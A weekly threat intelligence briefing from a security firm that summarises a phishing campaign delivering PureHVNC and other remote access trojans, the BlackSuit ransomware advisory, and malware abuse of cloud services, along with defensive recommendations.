eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Recent Threat Intelligence Advisories
Noteworthy News
PureHVNC Deployed via Python Multi-stage Loader
Bottom Line: Both eSentire and Fortinet have observed an email-based campaign delivering a multi-stage loader, leading to the deployment of a variety of malware. Organizations must be aware of sophisticated social engineering threats, implementing both human and technical controls.
On August 8th, FortiGuard Labs released a report on a phishing campaign targeting employees, posing as a customer in urgent need of a service. The email contained a malicious attachment that, when opened, deployed malware such as XWorm, Venom RAT, AsyncRAT, and PureHVNC. They were all observed utilizing packing and obfuscation techniques like the Python obfuscator 'Kramer,' shellcode generator 'Donut,' and shellcode loader 'laZzzy' to evade detection.
The attack flow consists of intricate steps, starting with an email masquerading as a customer inquiry. The attack escalates as victims open an HTML attachment triggering the execution of hidden malicious code within LNK files using the "search-ms" functionality. Employing obfuscation techniques, the attack progresses with the execution of a remote batch file named 'new.bat' disguised as a decoy PDF, leading to the download and extraction of Python programs. These Python files, utilizing shellcode loaders like 'Kramer' and 'Donut,' to decode and execute shellcode while evading detection mechanisms like AMSI/WLDP. The use of shellcode loader 'laZzzy' further conceals malicious activities by injecting shellcode into legitimate processes like 'notepad.exe,' ultimately executing the final payload consisting of XWorm, Venom RAT, AsyncRAT, and PureHVNC.
The PureHVNC malware gathers victim information, communicates with a Command-and-Control (C2) server, and targets specific applications like crypto wallets and password managers. It utilizes plugins such as PluginRemoteDesktop and PluginExecuting to execute additional files, update the program, and collect sensitive data. These plugins handle various commands, including downloading and executing files, restarting connections, and manipulating victim systems to serve the attacker's objectives.
eSentire Threat Intelligence Analysis:
The ongoing evolution of cyber threats underscores the need for a multi-faceted approach to cybersecurity defense. Threat actors' use of TryCloudflare to conceal their malicious activities represents a notable shift towards leveraging trusted cloud services for nefarious purposes. By routing traffic through Cloudflare's infrastructure, attackers can evade traditional detection mechanisms. This tactic, combined with the deployment of sophisticated malware like XWorm, AsyncRAT, VenomRAT, and PureLogs Stealer, demonstrates a significant escalation in the complexity and sophistication of modern cyberattacks.
The exploitation of human psychology and trust through convincing email lures further emphasizes the crucial role of user awareness training in mitigating cybersecurity risks. As attackers craft increasingly convincing messages to deceive recipients into unwittingly engaging with malicious content, the importance of vigilance and skepticism when interacting with digital communication cannot be overstated. Organizations must enhance their training programs and promote a culture of cyber resilience to empower individuals to recognize and respond effectively to social engineering tactics.
In addition to the insights provided by FortiGuard Labs, eSentire has also contributed valuable findings to the cybersecurity landscape. The report titled "Quartet of Trouble: XWorm, AsyncRAT, VenomRAT, and PureLogs Stealer Leverage TryCloudflare" was released on July 31, 2024, shedding light on a multi-stage attack impacting a government industry client. The convergence of findings from both entities indicates a concerning rise in the prevalence of these sophisticated attacks, suggesting that this emerging threat may be here to stay. The parallel analyses underscore the urgency for organizations to fortify their defenses and adopt proactive strategies to defend against the escalating complexity and persistence of cyber threats.
Furthermore, the analysis of the eSentire and FortiGuard Labs reports illuminate the challenges in accurately attributing specific malware variants and understanding their capabilities. The distinction between PureLogs Stealer and PureHVNC, as highlighted in the reports, underscores the nuanced nature of threat intelligence analysis and the importance of identifying and acting upon Indicators of Compromise (IoCs). By staying abreast of emerging threat trends, leveraging comprehensive threat intelligence, and fostering a proactive cybersecurity posture, organizations can better defend against the relentless innovation and sophistication of modern cyber threats.
#StopRansomware: BlackSuit (Royal) Ransomware
Bottom Line: CISA has confirmed that the BlackSuit ransomware is a rebranding of the Royal ransomware group. BlackSuit is highly active, targeting a variety of industries around the globe, with ransom demands ranging from $1 million to $10 million USD.
The Cybersecurity and Infrastructure Security Agency (CISA) in coordination with the FBI, have updated the #StopRansomware advisory for BlackSuit ransomware. The report now includes additional Indicators of Compromise(IoCs), known attacker Tactics, Techniques, and Procedures (TTPs), and attribution to the now defunct ransomware group Royal. The Royal ransomware group was active from September 2022 through June 2023, slightly overlapping with the emergence of BlackSuit ransomware in May 2023. The two ransomware types share significant code similarities, with notable improvements made to the BlackSuit version. BlackSuit is a closed Ransomware-as-a-Service (RaaS) operation; meaning that affiliates deploy the ransomware in attacks, but the group is difficult for affiliates to joint, requiring a proven track record or cybercrime.
The BlackSuit group employs a variety of different means for gaining initial access into victim organizations. BlackSuit affiliates have been observed employing phishing emails with attached malicious PDFs, Remote Desktop Protocol (RDP) compromise, exploiting vulnerabilities in public facing application, and purchasing access via third parties. According to the August 7th report update, phishing emails are “the most successful vectors for initial access by BlackSuit threat actors”.
Post initial access, threat actors disable antivirus software, exfiltrate victim data, and deploy the ransomware payload. Data is stolen from victim organizations to enable the double extortion technique, where stollen information is employed for extra leverage during ransom negotiations. If the ransom demand is not met, the data is then posted to the BlackSuit leak site.
There has recently been an increase in the number of BlackSuit ransomware events that involve victims receiving either phone or email communications from the BlackSuit actors, regarding the breach and ransom demand. Public reports state that multiple hospitals have disclosed that the BlackSuit ransomware has directly contacted hospital patients and customers.
BlackSuit ransom demands generally range from $1 million to $10 million USD, although the largest recorded demand by the group reached $60 million USD. According to CISA, the group has demanded over $500 million in total ransom demands across all victims. While ransom demands are high, compared to other groups, BlackSuit has demonstrated a willingness to negotiate with victims, leading to much lower ransom payments. Paying for decryption is not recommended. The FBI states that, “paying a ransom doesn’t guarantee you or your organization will get any data back. It also encourages perpetrators to target more victims and offers an incentive for others to get involved in this type of illegal activity.”
eSentire Threat Intelligence Analysis:
The rebranding of ransomware groups is not a new tactic. It has been employed by a wide variety of ransomware groups in the past (ie. Conti, BlackMatter). There are two primary reasons that ransomware groups employ this technique. To limit law-enforcement attention, especially after a high-profile attack; this was observed in the case of Darkside’s attack on Colonial Pipeline in 2021, with the group rebranding under the name BlackMatter. Or to perform an exit scam, where ring leaders take all the funds without paying their affiliates, as illustrated in BlackCat ransomware’s shutdown. It should be noted that BlackCat is also a rebranding of BlackMatter, connecting the mentioned groups together.
The tactic of calling and emailing victims and customers is notable. This strategy is meant to apply further pressure on victim organizations to pay the ransom demand, as the contacted customers will then reach out to the organization and potentially media. Sophos Field CTO Chester Wisniewski publicly stated that the tactic is not effective, as ransomware victims chose whether to pay a ransom demand based on other factors such as downtime and regulatory concerns. While the effectiveness is under question, the additional negative impact to the victim organization is not. By contacting customers or business partners, the reputational damage to the victim organization will increase.
Organizations are strongly recommended to deploy an Endpoint Detection and Response (EDR) product across all workstations and servers, to enable the rapid identification and remediation of threats before they escalate to ransomware deployment. CISA provides a number of other recommendations, including network segmentation, adoption of Multi-Factor Authentication (MFA), and regularly auditing systems and applying security patches. For a full list of recommendations, see the #StopRansomware report.
In response to the updated #StopRansomware report, eSentire’s Threat Intelligence team has performed threat hunts based on shared Indicators of Compromise (IoCs). eSentire MDR for Endpoint detections activity associated with ransomware precursor and deployment activity. Both eSentire MDR for Endpoint and Network detect tools known to be employed in BlackSuit ransomware cases.
How Malicious Actors Are Leveraging Cloud Service
Bottom Line: Many modern organizations utilize legitimate cloud platforms in day-to-day operations. Threat actors can leverage this to blend malicious activity within common operations, hosting command- and-control or exfiltration infrastructure.
Symantec's Threat Hunter Team has discovered new backdoors and exfiltration tools being used by threat actors leveraging legitimate cloud services. This indicates a growing trend among attackers to exploit cloud infrastructure for both espionage and financially motivated operations globally. Commonly abused cloud services include Microsoft Outlook, Google Drive, AWS, and One Drive. Threat actors are using these services to host malicious payloads and for command-and-control (C2).
The report includes five examples of recent campaigns involving cloud infrastructure and multiple previously unidentified malware types. In November of 2023, a new backdoor dubbed GoGra, which uses Microsoft Outlook for its C2 server, was identified impacting a media organization in South Asia. The Firefly espionage group was discovered using a previously unseen data exfiltration tool, tracked as Google Drive Exfiltration, which uploads victim data to Google Drive. Grager, another previously unseen backdoor, was recently discovered targeting organizations in Taiwan, Hong Kong, and Vietnam; its C2 servers were hosted on Microsoft OneDrive. The MoonTag backdoor employs Microsoft Graph API; this tool is still in development but was discovered due to uploads to the online file scanning and malware repository, VirusTotal. The final cloud related malware included in the report is Onedrivetools, a multi-stage backdoor used to target IT companies in the U.S. and Europe. The first stage of the malware is a Loader that authenticates to Microsoft Graph API and the second stage is then downloaded from OneDrive.
In order to defend against similar attacks, organizations are recommended to block cloud services that are not actively used in the organization, monitor critical assets for data exfiltration, and ensure Endpoint Monitoring and Response (EDR) capabilities are deployed to all workstation and servers to identify malicious activity.
eSentire Threat Intelligence Analysis:
Both financially motivated threat actors and state-sponsored APT groups are relying on cloud infrastructure in their attacks. According to the Symantec report, cloud abuse has become increasingly common over the last year. Cloud infrastructure has become a popular option for threat actors due to ease of use, cost, and the inherent trust in large cloud providers. As services like Google Drive and OneDrive are common across businesses, malicious use of these services is less likely to be automatically detected and will not stand out to human analysts as unusual.
The eSentire Threat Intelligence team expects the trend of cloud service abuse for malware delivery and C2 infrastructure to continue and increase through 2024. The eSentire Threat Intelligence team has performed threat hunts for relevant Indicators of Compromise and blocked known malicious infrastructure via the eSentire Global Blocklist. Research into new detection opportunities for the threats in this report are ongoing.
About the threat briefings:
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
